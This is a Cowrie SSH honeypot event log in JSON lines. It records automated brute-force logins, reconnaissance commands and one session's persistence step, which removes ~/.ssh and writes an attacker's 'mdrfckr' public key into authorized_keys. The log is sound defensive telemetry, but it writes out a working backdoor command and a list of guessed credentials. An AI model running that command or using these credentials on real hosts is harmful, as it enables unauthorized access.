{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T05:46:24.031459Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:46:24.032604Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:24.171212Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:24.499168Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T05:46:24.499880Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:24.644165Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:24.935117Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T05:46:24.935992Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.login.success","username":"root","password":"test_123456","message":"login attempt [root/test_123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:46:25.006616Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:25.088355Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:25.455534Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T05:46:25.456219Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:25.505793Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:46:25.506467Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:46:25.563593Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:25.597090Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:25.807099Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:25.880301Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T05:46:25.880970Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:26.012069Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.closed","duration":"17.0","message":"Connection lost after 17.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:26.013251Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:26.373010Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:46:26.374000Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:46:26.619229Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:26.620099Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56075,"dst_ip":"1.2.3.4","dst_port":22,"session":"696a5e3bc39a","protocol":"ssh","message":"New connection: 212.227.235.229:56075 (1.2.3.4:22) [session: 696a5e3bc39a]","sensor":"my-vps","timestamp":"2025-09-09T05:46:26.879048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:46:26.880000Z","src_ip":"212.227.235.229","session":"696a5e3bc39a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:46:27.140334Z","src_ip":"212.227.235.229","session":"696a5e3bc39a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:46:28.223755Z","src_ip":"212.227.235.229","session":"696a5e3bc39a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:29.486731Z","src_ip":"212.227.235.229","session":"696a5e3bc39a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56370,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c7a3bedb59b","protocol":"ssh","message":"New connection: 212.227.235.229:56370 (1.2.3.4:22) [session: 4c7a3bedb59b]","sensor":"my-vps","timestamp":"2025-09-09T05:46:29.780320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:46:29.780979Z","src_ip":"212.227.235.229","session":"4c7a3bedb59b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:46:30.095437Z","src_ip":"212.227.235.229","session":"4c7a3bedb59b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48886,"dst_ip":"1.2.3.4","dst_port":22,"session":"d139b45182d4","protocol":"ssh","message":"New connection: 212.227.235.229:48886 (1.2.3.4:22) [session: d139b45182d4]","sensor":"my-vps","timestamp":"2025-09-09T05:46:31.354311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:46:31.355774Z","src_ip":"212.227.235.229","session":"d139b45182d4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:46:31.381945Z","src_ip":"212.227.235.229","session":"4c7a3bedb59b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:46:31.526469Z","src_ip":"212.227.235.229","session":"d139b45182d4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:31.707898Z","src_ip":"212.227.235.229","session":"4c7a3bedb59b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:31.710047Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.login.failed","username":"tester","password":"P@ssw0rd","message":"login attempt [tester/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T05:46:32.422380Z","src_ip":"212.227.235.229","session":"d139b45182d4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:33.592928Z","src_ip":"212.227.235.229","session":"d139b45182d4"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":32798,"dst_ip":"1.2.3.4","dst_port":22,"session":"32664972af89","protocol":"ssh","message":"New connection: 213.6.203.226:32798 (1.2.3.4:22) [session: 32664972af89]","sensor":"my-vps","timestamp":"2025-09-09T05:46:36.562981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:46:36.563718Z","src_ip":"213.6.203.226","session":"32664972af89"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:46:36.631708Z","src_ip":"213.6.203.226","session":"32664972af89"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123","message":"login attempt [dev/dev123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:46:36.945129Z","src_ip":"213.6.203.226","session":"32664972af89"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:38.014976Z","src_ip":"213.6.203.226","session":"32664972af89"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:44.668807Z","src_ip":"79.124.8.120","session":"c73b34a915b0"}
{"eventid":"cowrie.session.closed","duration":180.07602763175964,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:44.674718Z","src_ip":"79.124.8.120","session":"c73b34a915b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38886,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8db61cbe3f9","protocol":"ssh","message":"New connection: 212.227.235.229:38886 (1.2.3.4:22) [session: f8db61cbe3f9]","sensor":"my-vps","timestamp":"2025-09-09T05:47:10.500433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:47:10.501300Z","src_ip":"212.227.235.229","session":"f8db61cbe3f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:47:10.582206Z","src_ip":"212.227.235.229","session":"f8db61cbe3f9"}
{"eventid":"cowrie.login.failed","username":"server","password":"Password1","message":"login attempt [server/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:47:10.945827Z","src_ip":"212.227.235.229","session":"f8db61cbe3f9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:12.029671Z","src_ip":"212.227.235.229","session":"f8db61cbe3f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3975,"dst_ip":"1.2.3.4","dst_port":22,"session":"0125d2bb4070","protocol":"ssh","message":"New connection: 212.227.125.160:3975 (1.2.3.4:22) [session: 0125d2bb4070]","sensor":"my-vps","timestamp":"2025-09-09T05:47:25.158338Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:25.159430Z","src_ip":"212.227.125.160","session":"0125d2bb4070"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":4250,"dst_ip":"1.2.3.4","dst_port":22,"session":"7457d891163c","protocol":"ssh","message":"New connection: 212.227.125.160:4250 (1.2.3.4:22) [session: 7457d891163c]","sensor":"my-vps","timestamp":"2025-09-09T05:47:25.270266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:47:25.271340Z","src_ip":"212.227.125.160","session":"7457d891163c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T05:47:25.383803Z","src_ip":"212.227.125.160","session":"7457d891163c"}
